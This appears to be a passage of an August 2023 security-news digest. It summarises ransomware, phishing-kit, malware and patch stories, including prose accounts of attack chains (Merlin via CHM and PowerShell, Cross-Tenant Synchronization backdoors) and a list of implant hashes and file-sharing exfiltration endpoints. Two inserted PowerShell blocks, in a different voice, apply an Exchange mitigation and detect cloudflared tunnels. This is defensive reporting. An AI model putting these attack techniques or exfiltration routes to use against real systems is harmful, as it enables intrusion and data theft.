            Autosummary: "Black Axe, and an increasing number of other West African organized crime syndicates, is a violent mafia-style gang renowned for cyber-enabled financial fraud, in particular business email compromise schemes, romance scams, inheritance scams, credit card fraud, tax fraud, advance payment scams and money laundering," the agency noted.


            Rhysida ransomware – what you need to know

            exploits ransomware
            2023-08-10 https://www.tripwire.com/state-of-security/rhysida-ransomware-what-you-need-know
            Rhysida is a Windows-based ransomware operation that has come to prominence since May 2023, after being linked to a series of high-profile cyber attacks in Western Europe, North and South America, and Australia. Learn more in my article on the Tripwire State of Security blog.

            Autosummary: If you do have a backup that works, then you not only have the hassle of restoring your systems, but you may also worry about the damage which could be done to your brand, your customer relationships, and partnerships if the Rhysida group follows through on its threats and publishes stolen data on the dark web. "The potential ramifications of this could be dire, including the sale, publication, or distribution of your data to competitors or media outlets."


            SentinelOne enhances vulnerability management through Singularity Ranger Insights

            exploits
            2023-08-10 https://www.helpnetsecurity.com/2023/08/10/sentinelone-singularity-ranger-insights/

            SentinelOne has launched Singularity Ranger Insights. The solution removes the complexity from vulnerability management, enabling companies to continuously discover unmanaged assets, evaluate and prioritize threats and mitigate risk using a single console and agent. “Today’s work-from-anywhere world has opened the door to an increasing number of vulnerabilities, and when it comes to managing them, the stakes have never been higher,” said Lana Knop, VP of Product Management, Endpoint and Identity Products, SentinelOne. “More than 25 … More

            The post SentinelOne enhances vulnerability management through Singularity Ranger Insights appeared first on Help Net Security.



            Emerging Attacker Exploit: Microsoft Cross-Tenant Synchronization

            exploits
            2023-08-10 https://thehackernews.com/2023/08/emerging-attacker-exploit-microsoft.html
            Attackers continue to target Microsoft identities to gain access to connected Microsoft applications and federated SaaS applications. Additionally, attackers continue to progress their attacks in these environments, not by exploiting vulnerabilities, but by abusing native Microsoft functionality to achieve their objective. The attacker group Nobelium, linked with the SolarWinds attacks, has been

            Autosummary: [Figure 3: compromised account deploying a Cross Tenant Access Policy in the compromised tenant; Figure 4: compromised account enabling Inbound Sync into the tenant; Figure 5: compromised account enabling Automatic User Consent Redemption] Attacker actions that would occur prior to the attack, such as the account access following a token theft or other forms of account compromise, would be alerted on by Vectra detections like Azure AD Unusual Scripting Engine Usage, Azure AD Suspicious Sign-on or Azure AD Suspicious OAuth Application.
            Terminology:
            - Source tenant: tenant from where users & groups are getting synced
            - Target tenant: tenant with resources where users & groups are getting synced
            - Resources: Microsoft applications (Teams, SharePoint, etc.) and non-Microsoft applications (ServiceNow, Adobe, etc.)
            Cross-Tenant Synchronization: CTS is a new feature from Microsoft that enables organizations to synchronize users and groups from other source tenants and grant them access to resources (both Microsoft and non-Microsoft applications) in the target tenant.
            Technique 1: Lateral Movement. An attacker operating in a compromised environment can exploit an existing CTS configuration tenant to move laterally from one tenant to another connected tenant.
            Scenario 2: Backdoor. An attacker operating in a compromised tenant can deploy a rogue Cross Tenant Access configuration to maintain persistent access.


            Cybercriminals Increasingly Using EvilProxy Phishing Kit to Target Executives

            financial ciber
            2023-08-10 https://thehackernews.com/2023/08/cybercriminals-increasingly-using.html
            Threat actors are increasingly using a phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy to pull off account takeover attacks aimed at high-ranking executives at prominent companies. According to Proofpoint, an ongoing hybrid campaign has leveraged the service to target thousands of Microsoft 365 user accounts, sending approximately 120,000 phishing emails to hundreds of organizations

            Autosummary: EvilProxy was first documented by Resecurity in September 2022, detailing its ability to compromise user accounts associated with Apple iCloud, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, NPM, PyPI, RubyGems, Twitter, Yahoo, and Yandex, among others. "


            Lookout SAIL improves efficiency for cybersecurity professionals

            ciber
            2023-08-10 https://www.helpnetsecurity.com/2023/08/10/lookout-sail/

            Lookout launched Lookout SAIL, a new generative artificial intelligence (gen AI) assistant that will reshape the way cybersecurity professionals interact with Lookout Mobile Endpoint Security and Lookout Cloud Security solutions and conduct cybersecurity analysis and data protection. In the rapidly evolving landscape of cybersecurity, companies are engaged in an ongoing battle against cyber criminals who are constantly innovating new tactics. As cyber threats become increasingly sophisticated, every organization faces challenges such as a growing skills … More

            The post Lookout SAIL improves efficiency for cybersecurity professionals appeared first on Help Net Security.


            Autosummary: “It’s the start of a journey that fundamentally transforms how people interact with systems and information, touching everything from onboarding to training, as well as cybersecurity tasks like administration, policy creation, incident response, and threat hunting,” said Aaron Cockerill, Chief Strategy Officer, Lookout.


            Appdome and Bugcrowd join forces to create a more secure mobile app economy

            exploits
            2023-08-10 https://www.helpnetsecurity.com/2023/08/10/appdome-bugcrowd/

            Appdome has unveiled that Bugcrowd joined its new Mobile App Defense Project, a community program aimed at improving mobile DevSecOps for everyone. This collaboration aims to create a more secure mobile app economy, raise the bar on mobile app defense, and provide rapid, validated, continuous cyber and anti-fraud solutions for all mobile applications globally. As mobile application use and revenues continue to rise dramatically, mobile application security testing is a hot topic and fast emerging … More



            New Attack Alert: Freeze[.]rs Injector Weaponized for XWorm Malware Attacks

            exploits
            2023-08-10 https://thehackernews.com/2023/08/new-attack-alert-freezers-injector.html
            Malicious actors are using a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. The novel attack chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated via a phishing email containing a booby-trapped PDF file. It has also been used to introduce Remcos RAT by means of a crypter called SYK Crypter, which was

            Autosummary: SYK Crypter, on the other hand, is a tool employed to distribute a wide variety of malware families such as AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (aka Ave Maria).


            New Statc Stealer Malware Emerges: Your Sensitive Data at Risk

            exploits
            2023-08-10 https://thehackernews.com/2023/08/new-statc-stealer-malware-emerges-your.html
            A new information-stealing malware strain called Statc Stealer has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information. "Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week. "It can steal


            Gafgyt malware exploits five-years-old flaw in EoL Zyxel router

            exploits
            2023-08-10 https://www.bleepingcomputer.com/news/security/gafgyt-malware-exploits-five-years-old-flaw-in-eol-zyxel-router/
            Fortinet has issued an alert warning that the Gafgyt botnet malware is actively trying to exploit a vulnerability in the end-of-life Zyxel P660HN-T1A router in thousands of daily attacks. [...]

            Autosummary: Common signs of botnet infections on routers include unstable connectivity, device overheating, sudden configuration changes, unresponsiveness, atypical network traffic, opening up of new ports, and unexpected reboots.


            Ransomware review: August 2023

            exploits
            2023-08-10 https://www.malwarebytes.com/blog/threat-intelligence/2023/08/ransomware-review-august-2023

            Categories: Threat Intelligence

            July saw one of the highest numbers of ransomware attacks in 2023, at 441. At the forefront of these attacks is, once again, Cl0p.


            Autosummary: [Chart] Known ransomware attacks by industry sector, July 2023. In an article published in October of last year, we speculated on the future evolution of ransomware and how, with the rise of double-extortion schemes, more and more gangs might pivot away from using encryptors entirely. One possible reason for this increase, says Chainalysis, could be that because fewer and fewer firms are willing to pay the ransom, ransomware gangs are increasing the size of their ransom demands, the idea being to squeeze the most money possible out of the firms still willing to pay. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This ransomware is versatile, capable of compromising Windows, Linux, and macOS systems alike. [Chart] Known ransomware attacks by gang, July 2023. The LockBit gang is experiencing a steady four-month decline in the number of attacks it has carried out.


            August Patch Tuesday stops actively exploited attack chain and more

            exploits
            2023-08-10 https://www.malwarebytes.com/blog/news/2023/08/august-patch-tuesday-stops-actively-exploited-attack-chain-and-more

            Categories: Exploits and vulnerabilities

            Categories: News

            Microsoft has announced patches for 87 vulnerabilities this month, including two that are being actively exploited.


            Autosummary: ...or apply the solution for the CVE manually on each server by running the following command from an elevated PowerShell window:

            Clear-WebConfiguration -Filter "/system.webServer/globalModules/add[@name='TokenCacheModule']" -PSPath "IIS:\"

            To roll back the solution for the CVE manually on each server, run the following:

            New-WebGlobalModule -Name "TokenCacheModule" -Image "%windir%\System32\inetsrv\cachtokn.dll"

            Although Microsoft recommends installing the security updates as soon as possible, running the script or the commands on a supported version of Exchange Server prior to installing the updates will address this vulnerability. Other vulnerabilities that deserve some attention are six vulnerabilities in Microsoft Exchange Server, including CVE-2023-21709 (CVSS score 9.8 out of 10), a Microsoft Exchange Server elevation of privilege (EoP) vulnerability which could allow an attacker to log in as another user.
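            A wrapper around the manual mitigation quoted above, added here as an example; it is not Microsoft's CVE-2023-21709 script and not code from the Malwarebytes post. It checks whether TokenCacheModule is still registered in IIS before and after removal, using the WebAdministration module that ships with IIS on the Exchange server. The function names are this example's own; the Clear-WebConfiguration and New-WebGlobalModule calls are the ones Microsoft publishes, with the XPath attribute selector in single quotes so the outer double-quoted string is not cut short.

```powershell
# Added example, not Microsoft's script. Run from an elevated PowerShell window
# on each Exchange server. Assumes the WebAdministration module (installed with IIS).
#Requires -RunAsAdministrator
Import-Module WebAdministration

function Get-TokenCacheModuleState {
    # $true when the global module is still registered in applicationHost.config.
    $module = Get-WebGlobalModule -Name 'TokenCacheModule' -ErrorAction SilentlyContinue
    return [bool]$module
}

function Remove-TokenCacheModule {
    # The mitigation command as published, with single quotes inside the XPath selector.
    Clear-WebConfiguration -Filter "/system.webServer/globalModules/add[@name='TokenCacheModule']" -PSPath 'IIS:\'
}

function Restore-TokenCacheModule {
    # Roll-back: re-register the module with the DLL named in the published guidance.
    New-WebGlobalModule -Name 'TokenCacheModule' -Image "$env:windir\System32\inetsrv\cachtokn.dll"
}

if (Get-TokenCacheModuleState) {
    Write-Host 'TokenCacheModule is registered; removing it'
    Remove-TokenCacheModule
    if (Get-TokenCacheModuleState) { throw 'TokenCacheModule is still registered after Clear-WebConfiguration' }
    Write-Host 'TokenCacheModule removed; install the security update next'
} else {
    Write-Host 'TokenCacheModule already absent; nothing to do'
}
```

            The post-removal re-check is the point of the wrapper: the mitigation only counts once the module is gone from the configuration, so a deployment that reports success without re-reading the state has verified nothing. Restore-TokenCacheModule is defined but not called; invoke it by hand if the roll-back is needed.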


            Common TTPs of attacks against industrial organizations. Implants for uploading data

            industry
            2023-08-10 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-uploading-data/
            In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered.

            Autosummary: Third-step implant MD5 hashes, listed as in the source table (hash, then file name; the hash for cl.exe falls before the excerpt and is not included): (cl.exe); F8553382DE7E1E349D8E91EDB7C57953 (cu.exe); 5137C61734E2096018CEE99149DAC009 (conhost.exe); 5660CB556D856D081A3DCD497549F47A (Rar2.exe); 976B59F170136B9C3C88BD9A8FC4CE4E (Rar3.exe); D6CC6A4AF4720DAF8EEE0835D6E5D374 (Rar4.exe).

            Tool used to upload files to Yandex Disk: MD5 5C3A88073824A1BCE4359A7B69ED0A8D (AuditSvc.exe). Tool used to upload files to temporary file sharing services: MD5 8BA9EE9FD6BD4B9304F7FB868CE975D8 (transfer.exe).

            IP/URL: img[.]onl/api/upload.php, litterbox.catbox[.]moe/resources/internals/api.php, imgbb[.]com, transfer[.]sh, share.schollz[.]com, 0x0[.]st/

            Services supported by the upload tool (service name, short code, URL):
            - imgonl (onl): https://img[.]onl/api/upload.php
            - litterbox (lit): https://litterbox.catbox[.]moe/resources/internals/api.php
            - imgbb (ibb): https://imgbb[.]com/
            - transfer (trs): https://transfer[.]sh
            - schollz: https://share.schollz[.]com
            - null (0x0): https://0x0[.]st/
            - tinyimg (tin): https://tinyimg[.]io/upload
            - gifyu (gif): https://gifyu[.]com/
            - imgshare (ims): https://imgshare[.]io/
            - imgpile (imp): https://imgpile[.]com/
            - zippyimage (zip): https://zippyimage[.]com/
            - extraimage (ext): https://extraimage[.]info/
            - picpaster (pic): https://upload.picpaste[.]me/
            - imaurupload (imu): https://imgurupload[.]org
            - sm.ms (sms): https://sm[.]ms/api/v2/upload
            - easycaptures (esy): https://easycaptures[.]com/upload_file_new.php

            Along with various parameters designed for flexibility and optimization, the tool can generate and use a client-side RSA key.

            [Figure] Third-step implant variant sending “.rar” files to some local C2. Later, the threat actor deployed a new variant of the second-step implant, whose capabilities included looking up file names in the Outlook folder (i.e., email account names), executing remote commands and uploading local or remote “.rar” files to Dropbox by calling the third-step implant.

            The entire stack of implants used in attacks can be divided into three categories based on their roles: first-stage implants for persistent remote access and initial data gathering; second-stage implants for gathering data and files, including from air-gapped systems; third-stage implants and tools used to upload data to C2.

            [Figure] Second-step implant starts a third-step implant (named “cl.exe”) to upload “.rar” files to Dropbox. It should be noted that before calling the third-step implant to upload files, the second-step implant prepends a custom header to each “.rar” file.

            [Figure] JSON log produced by the tool. The threat actor most probably used the tool manually or semi-manually to upload logs and other files to file sharing services, while the resulting JSON containing URLs could be uploaded by any of the first-stage implants described in the first part of the article or by the implant designed to send a single file, “111.log”, as an email attachment via the Yandex email service (that implant is described below).

            [Figure] Using some unknown tool to check privileges to access a remote host. To upload local files, the second-step implant calls a third-step implant, which is supposed to be already deployed on the machine either at the statically defined path “c:/users/public/” or at the same path as the second-step implant.


            Why cybersecurity is a blue-collar job

            ciber
            2023-08-09 https://www.helpnetsecurity.com/2023/08/09/cybersecurity-talent-pool/

            Cybersecurity has witnessed exponential growth in recent years, fueled by the increasing sophistication of cyber threats. As the demand for skilled professionals continues to surge, traditional approaches to education and job requirements are being challenged. In this article, I will explore the paradigm shift in the cybersecurity industry toward embracing practical expertise and hands-on experience over a formal college degree. I will examine the reasons behind this shift and its benefits for aspiring cybersecurity professionals … More


            Autosummary: Not to say they ever were, but the days of expecting candidates to possess a wide range of skills, such as network security experience, system security administration, application design, and forensics are no longer realistic. By shifting our focus toward practical skills and hands-on experience, we can recognize the accessibility of coding, engineering, and cybersecurity training beyond the confines of traditional college degrees.


            Using creative recruitment strategies to tackle the cybersecurity skills shortage

            ciber
            2023-08-09 https://www.helpnetsecurity.com/2023/08/09/jon-check-cybersecurity-career-talent/

            With the increasing complexity of cyber threats and the global shortage of cybersecurity experts, organizations are looking for creative approaches to recruiting and retaining top talent. In this Help Net Security interview, Jon Check, Executive Director of Cybersecurity Protection Solutions at Raytheon, sheds light on the significance of internships and apprenticeships in nurturing the next generation of cyber defenders. How do internships and apprenticeships contribute to bridging the theoretical and practical divide in the cybersecurity … More


            Autosummary: This can include cyber competitions that enable students to gain hands-on experience, test their skills, network, and connect with mentors, laying a critical foundation to prepare themselves for a career in cyber (i.e., National Collegiate Cyber Defense Competition and US Cyber Games). Leaders must first reframe their mindset around what makes a qualified cyber defender, beyond checking specific boxes (i.e., specific degrees from prestigious colleges) and extending it to focus on soft skills, including critical thinking, problem-solving, and public speaking.


            The ransomware rollercoaster continues as criminals advance their business models

            exploits ransomware
            2023-08-09 https://www.helpnetsecurity.com/2023/08/09/ransomware-detections-1h-2023/

            Ransomware shows no signs of slowing, with ransomware activity ending 13 times higher than at the start of 2023 as a proportion of all malware detections, according to Fortinet. Ransomware detections 1H 2023 FortiGuard Labs has documented substantial spikes in ransomware variant growth in recent years, largely fueled by the adoption of Ransomware-as-a-Service (RaaS). However, FortiGuard Labs found that fewer organizations detected ransomware in the first half of 2023 (13%) compared to this time five … More


            Autosummary: Botnets lingering in networks longer than ever. While the report finds more active botnets (+27%) and a higher incidence rate among organizations over the last half-decade (+126%), one of the more shocking findings is the exponential increase in the total number of “active days”, which FortiGuard Labs defines as the amount of time that transpires between the first hit of a given botnet attempt on a sensor and the last. FortiGuard Labs continues to observe wipers being used by nation-state actors, although the adoption of this type of malware by cybercriminals continues to grow as they target organizations in technology, manufacturing, government, telecommunications, and healthcare sectors.


            Recent ransomware attacks share curiously similar tactics

            exploits ransomware industry
            2023-08-09 https://www.helpnetsecurity.com/2023/08/09/ransomware-attacks-similarities/

            A series of ransomware attacks made by different groups share curiously similar characteristics, according to Sophos. Sophos released new findings into the connections between the most prominent ransomware groups this past year, including Royal, in its Clustering Attacker Behavior Reveals Hidden Patterns report. Distinct similarities found in recent ransomware attacks Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one … More


            Autosummary: Distinct similarities found in recent ransomware attacks. Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one by Black Basta, and noticed distinct similarities between the attacks.


            Malicious Campaigns Exploit Weak Kubernetes Clusters for Crypto Mining

            exploits
            2023-08-09 https://thehackernews.com/2023/08/malicious-campaigns-exploit-weak.html
            Exposed Kubernetes (K8s) clusters are being exploited by malicious actors to deploy cryptocurrency miners and other backdoors. Cloud security firm Aqua, in a report shared with The Hacker News, said a majority of the clusters belonged to small to medium-sized organizations, with a smaller subset tied to bigger companies, spanning financial, aerospace, automotive, industrial, and security sectors


            New Report Exposes Vice Society's Collaboration with Rhysida Ransomware

            exploits ransomware
            2023-08-09 https://thehackernews.com/2023/08/new-report-exposes-vice-societys.html
            Tactical similarities have been unearthed between the double extortion ransomware group known as Rhysida and Vice Society, including in their targeting of education and healthcare sectors. "As Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that

            Autosummary: "They primarily attack education, government, manufacturing, and technology and managed service provider sectors; however, there have been recent attacks against the Healthcare and Public Health (HPH) sector," the U.S. Department of Health and Human Services' Health Sector Cybersecurity Coordination Center said in an alert last week.


            Preventative medicine for securing IoT tech in healthcare organizations

            industry
            2023-08-09 https://www.bleepingcomputer.com/news/security/preventative-medicine-for-securing-iot-tech-in-healthcare-organizations/
            Healthcare organizations are increasingly at risk from threat actors targeting the Internet of Medical Things. Learn more from Outpost24 on how attack surface management can secure IoMT devices. [...]

            Autosummary: Cloud-based databases, network services, firmware, individual devices, storage systems, servers, and web-based apps can each strengthen or weaken the security of the overall system. Using a combination of specialist in-house expertise along with our proprietary automation platform and attack surface analysis tools, we can provide everything from a single point-in-time risk analysis to longer-term planning, execution, and metrics collection as you work to reduce your exposure to Internet-based attacks. The IoT provides enhanced AI-enabled communication between a wide variety of devices, including mobile phones, wearable devices, industrial sensors, and actuating ports, which convey information through cloud storage databases. This type of attack offers a wide range of potential for manipulating and extorting healthcare organizations, whose databases contain an abundance of sensitive information about patient medical histories, current health records, home addresses, and financial details.


            EvilProxy phishing campaign targets 120,000 Microsoft 365 users

            financial
            2023-08-09 https://www.bleepingcomputer.com/news/security/evilproxy-phishing-campaign-targets-120-000-microsoft-365-users/
            EvilProxy is becoming one of the more popular phishing platforms to target MFA-protected accounts, with researchers seeing 120,000 phishing emails sent to over a hundred organizations to steal Microsoft 365 accounts. [...]

            Autosummary: [Figure] EvilProxy phishing attack flow (Source: Proofpoint). As reported in September 2022 by Resecurity, EvilProxy is sold to cyber criminals for $400/month, promising the ability to target Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and PyPI accounts.


            NetRise unveils SBOM and vulnerability prioritization solutions to enhance XIoT firmware security

            exploits industry
            2023-08-09 https://www.helpnetsecurity.com/2023/08/09/netrise-platform-sbom/

            NetRise announced advanced capabilities for maintaining and working with Software Bill of Materials (SBOMs) and support for the CISA’s KEV Catalog for managing and understanding the risks associated with software components in the firmware of connected devices. As the security of the software and firmware supply chain and regulation around SBOMs continue to dominate the industry landscape, the impact of consuming and generating a list of ‘ingredients’ for each device cannot be overstated. With the … More


            Autosummary: “Our goal is to alleviate the significant struggles that manufacturers, enterprises, and consultants globally face today when securing XIoT software and firmware, not only when building these products but also understanding the latent risk and impact of the latest exploitable vulnerability on devices in the field,” said Thomas Pace, CEO of NetRise.


            Dynatrace Security Analytics detects and blocks common application attacks

            industry
            2023-08-09 https://www.helpnetsecurity.com/2023/08/09/dynatrace-security-analytics/

            Dynatrace introduced Security Analytics, a new Dynatrace platform solution designed to help organizations better defend against threats to their hybrid and multicloud environments. Dynatrace Security Analytics leverages Davis AI, which combines predictive and causal AI techniques to provide security analysts with the precise answers and data context they need to prioritize and investigate threats and vulnerabilities. Later this year, Security Analytics will also include generative AI capabilities as part of Dynatrace’s planned expansion to provide … More


            Autosummary: Today’s security analytics platforms combine features to enable analytics, investigation, automation, threat hunting, dashboards, and reporting to help security analysts be more effective.”


            Missouri warns that health info was stolen in IBM MOVEit data breach

            financial
            2023-08-09 https://www.bleepingcomputer.com/news/security/missouri-warns-that-health-info-was-stolen-in-ibm-moveit-data-breach/
            Missouri's Department of Social Services warns that protected Medicaid healthcare information was exposed in a data breach after IBM suffered a MOVEit data theft attack. [...]

            Autosummary: "The information involved in this incident may include an individual's name, department client number (DCN), date of birth, possible benefit eligibility status or coverage, and medical claims information," explains the DSS notification.


            Rhysida ransomware behind recent attacks on healthcare

            exploits ransomware
            2023-08-09 https://www.bleepingcomputer.com/news/security/rhysida-ransomware-behind-recent-attacks-on-healthcare/
            The Rhysida ransomware as a service (RaaS) operation that emerged in May 2023 is gradually leaving the period of obscurity behind, as a recent wave of attacks on healthcare organizations has forced government agencies and cybersecurity companies to pay closer attention to its operations. [...]

            Autosummary: [Figure] Directories excluded from encryption (Source: Cisco). Check Point's report goes a step further, linking Rhysida to the now-defunct Vice Society ransomware operation, based on the victim publishing times on the two extortion sites and their similar victim targeting patterns. [Figure] Comparison of activity change in Vice Society and Rhysida (Check Point). In conclusion, Rhysida has established itself in the ransomware space quickly, targeting organizations in various sectors and showing no hesitation in attacking hospitals. At the time, a preliminary analysis of the Rhysida encryptor by SentinelOne showed that the ransomware was in early development, missing standard features seen in most strains like persistence mechanisms, Volume Shadow Copy wiping, process termination, etc. "This is an automated alert from cybersecurity team Rhysida," reads the Rhysida ransom note.


            Hackers use open source Merlin post-exploitation toolkit in attacks

            exploits
            2023-08-09 https://www.bleepingcomputer.com/news/security/hackers-use-open-source-merlin-post-exploitation-toolkit-in-attacks/
            Ukraine is warning of a wave of attacks targeting state organizations using "Merlin," an open-source post-exploitation and command and control framework. [...]

            Autosummary: [Figure] Sample of the malicious email (Source: CERT-UA). The emails carry a CHM file attachment that, if opened, executes JavaScript code which in turn runs a PowerShell script that fetches, decrypts, and decompresses a GZIP archive that contains the executable "ctlhost.exe." If the recipient runs this executable, their computer gets infected by MerlinAgent, giving the threat actors access to their machine, data, and a foothold to move laterally in the network.


            Cloudflare Tunnel increasingly abused by cybercriminals

            ciber
            2023-08-09 https://www.malwarebytes.com/blog/news/2023/08/cloudflare-tunnel-increasingly-abused-by-cybercriminals

            Categories: News

            Tags: Cloudflare Tunnel, cloudflared, rdp, hxxps, smb, ssh

            Researchers have found that cybercriminals are shifting to Cloudflare Tunnel to hide and anonymize their nefarious activities.


            Autosummary: Cloudflare Tunnel, also known by its executable name, cloudflared, reaches out to the Cloudflare edge servers by creating an outbound connection over HTTPS (HTTP/2 or QUIC); the tunnel’s controller then makes services or private networks reachable through Cloudflare console configuration changes. Because the connection is initiated from inside the network, inbound firewall rules never see it. It is used to allow external sources to directly access important services, including SSH (Secure Shell), RDP (Remote Desktop Protocol), SMB (Server Message Block), and others. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.
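            A host-side triage check for the tunnel mechanism described above, added here as an example and not code from the Malwarebytes post. It looks for the cloudflared process and service under their upstream default names and for established outbound TCP sessions to port 7844, the port cloudflared uses to reach Cloudflare's edge according to Cloudflare's own documentation (the post itself does not name the port). QUIC runs over UDP 7844 and will not show up in Get-NetTCPConnection, and a renamed binary defeats the name checks, so a clean result means "nothing obvious", not proof of absence; pair it with proxy or DNS logs. Find-CloudflaredTunnel is the example's own name.

```powershell
# Added example, not code from the Malwarebytes post. Windows host triage for a
# running cloudflared tunnel. Assumptions: default process/service names, and
# TCP 7844 as the edge port (from Cloudflare documentation, not from the post).

function Find-CloudflaredTunnel {
    # Returns one object per indicator found; no output means nothing was spotted.
    $hits = @()

    # 1. Process by its upstream default binary name.
    foreach ($proc in Get-Process -Name 'cloudflared' -ErrorAction SilentlyContinue) {
        $hits += [pscustomobject]@{ Indicator = 'process'; Detail = "PID $($proc.Id) $($proc.Path)" }
    }

    # 2. Windows service as installed by 'cloudflared service install'.
    foreach ($svc in Get-Service | Where-Object { $_.Name -like '*cloudflared*' -or $_.DisplayName -like '*cloudflare*tunnel*' }) {
        $hits += [pscustomobject]@{ Indicator = 'service'; Detail = "$($svc.Name) ($($svc.Status))" }
    }

    # 3. Established outbound TCP sessions to 7844, resolved back to the owning process
    #    (this is the check that survives a renamed binary).
    foreach ($conn in Get-NetTCPConnection -RemotePort 7844 -State Established -ErrorAction SilentlyContinue) {
        $owner = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
        $hits += [pscustomobject]@{
            Indicator = 'tcp7844'
            Detail    = "$($conn.RemoteAddress):$($conn.RemotePort) by PID $($conn.OwningProcess) $($owner.Path)"
        }
    }
    return $hits
}

Find-CloudflaredTunnel | Format-Table -AutoSize
```

            Run it in an elevated session so that OwningProcess resolves for processes running as other users. A hit on the network check with no matching process or service name is the interesting case: it is exactly what an attacker who renamed cloudflared would produce.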


            Getting the best possible outcome in ransomware negotiation

            exploits ransomware
            2023-08-08 https://www.helpnetsecurity.com/2023/08/08/azeem-aleem-ransomware-negotiation-service/

            Though typically seen as a final measure, 90% of participants from a BigID survey revealed that their company would contemplate paying a ransom if it meant they could recover data and business processes, or recover them faster. In this Help Net Security interview, Azeem Aleem, MD of UK and Northern Europe at Sygnia, unravels the complexities of ransomware negotiation and highlights the measures that organizations can take to protect themselves against cyber threats. Can you … More


            Autosummary: It’s an incredibly unique team with honed skills in technological supremacy, digital combat, data analytics, and business, to deliver military-grade security to organizations – in fact, one that nations quietly turn to for help. For example at Sygnia, we hand-pick the cream of the crop in talent from ranks of elite military technology units and the cyber industry such as ex-military intelligence officers, criminal psychologists, hostage-turned-ransomware hacking negotiators, and more. If your business is under attack, the threat actor can use it as an opportunity to ‘drip-feed’ extortions, promising to release data in a staggered approach to ensure they get the most out of their attack. The negotiation team will work to uncover the motives of the attacker, investigate the source, contain the threat, minimise the breach exposure time (BET) and then help to remediate and recover as a way to break the cycle of threats.


            Dark web activity targeting the financial sector

            financial
            2023-08-08 https://www.helpnetsecurity.com/2023/08/08/dark-web-activity-targeting-financial-sector-video/

            In this Help Net Security video, Jim Simpson, Director of Threat Intelligence at Searchlight Cyber, discusses threats against the financial sector. Threat actors will invariably target banks, yet by keeping an eye on the dark web, these institutions can identify illegal activities during their initial planning or pre-attack phase. This grants security teams crucial time to modify their defensive strategies accordingly.



            New Yashma Ransomware Variant Targets Multiple English-Speaking Countries

            exploits ransomware
            2023-08-08 https://thehackernews.com/2023/08/new-yashma-ransomware-variant-targets.html
            An unknown threat actor is using a variant of the Yashma ransomware to target various entities in English-speaking countries, Bulgaria, China, and Vietnam at least since June 4, 2023. Cisco Talos, in a new write-up, attributed the operation with moderate confidence to an adversary of likely Vietnamese origin. "The threat actor uses an uncommon technique to deliver the ransom note," security

            Autosummary: The development also follows a major spike in ransomware attacks, with Malwarebytes recording as many as 1,900 incidents over the past year within the U.S., Germany, France, and the U.K., mainly fueled by the "ascension of the Cl0p group – which has effectively harnessed zero-day vulnerabilities to amplify its attacks."


            UK Electoral Commission data breach exposes 8 years of voter data

            financial
            2023-08-08 https://www.bleepingcomputer.com/news/security/uk-electoral-commission-data-breach-exposes-8-years-of-voter-data/
            The UK Electoral Commission disclosed a massive data breach exposing the personal information of anyone who registered to vote in the United Kingdom between 2014 and 2022. [...]

            Autosummary: Therefore, all UK voters should be on the lookout for targeted phishing emails attempting to gather further sensitive information, such as passwords, account numbers, or financial information.


            XDR Alliance unveils open-source API specifications to improve cybersecurity for customers

            ciber
            2023-08-08 https://www.helpnetsecurity.com/2023/08/08/xdr-alliance-api-specifications/

            The XDR Alliance released a new set of open-source API specifications that help leading cybersecurity vendors collaborate and integrate their technology solutions. As a result, end user customer organizations worldwide can rationalize their disparate and previously siloed cybersecurity solutions, enabling them to more easily operationalize broader coverage for threat detection, investigation, and response (TDIR) use cases. Customers can extract more value from their existing technology tools and avoid proprietary approaches from portfolio vendors. On average, … More


Autosummary: The APIs have been developed in collaboration with member organizations with domain expertise across endpoint, network, cloud, identity, email security, security analytics, security log management, SIEM, and more to provide the most in-depth security coverage for organizations. “In cybersecurity, the network is a key source of truth, shining a light on all traffic: malicious, mundane, and everything in between,” said Phil Shigo, VP, Business Development, ExtraHop.


            North Korean hackers breached Russian missile development firm

            rusia-ucrania
            2023-08-08 https://www.helpnetsecurity.com/2023/08/08/north-korean-hackers-russia/

North Korean state-sponsored hackers have breached Russian missile maker NPO Mashinostroyeniya, according to SentinelLabs researchers.

North Korean hackers discovered

The researchers came across leaked email communication between NPO Mashinostroyeniya’s IT staff that contained information about a possible cyber intrusion first detected in May 2022. According to the emails, the breached company’s IT staff discovered a suspicious DLL file within company systems, which SentinelLabs researchers identified as a version of the OpenCarrot Windows OS backdoor previously … More



            QakBot Malware Operators Expand C2 Network with 15 New Servers

            exploits
            2023-08-08 https://thehackernews.com/2023/08/qakbot-malware-operators-expand-c2.html
The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of its C2 servers are only active for a single day. "QakBot has a history of taking an [...]



            Microsoft Office update breaks actively exploited RCE attack chain

            exploits
            2023-08-08 https://www.bleepingcomputer.com/news/security/microsoft-office-update-breaks-actively-exploited-rce-attack-chain/
Microsoft today released a defense-in-depth update for Microsoft Office that prevents exploitation of a remote code execution (RCE) vulnerability tracked as CVE-2023-36884 that threat actors have already leveraged in attacks. [...]



            Microsoft August 2023 Patch Tuesday warns of 2 zero-days, 87 flaws

            exploits
